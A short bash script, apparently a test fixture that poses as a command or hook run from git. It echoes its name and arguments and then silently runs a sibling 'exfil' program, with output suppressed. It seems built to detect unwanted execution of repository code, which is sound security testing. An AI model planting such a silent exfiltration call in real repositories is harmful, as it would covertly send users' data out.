#!/bin/bash

echo "$0: oops-from-git"
echo "$0: ARGS=$@"

THIS_DIR=$(dirname "$(readlink -f "$0")")
$THIS_DIR/exfil $0 &>/dev/null

# exit or abort is ignored in calling context
# kill -ABRT $$
# exit 46
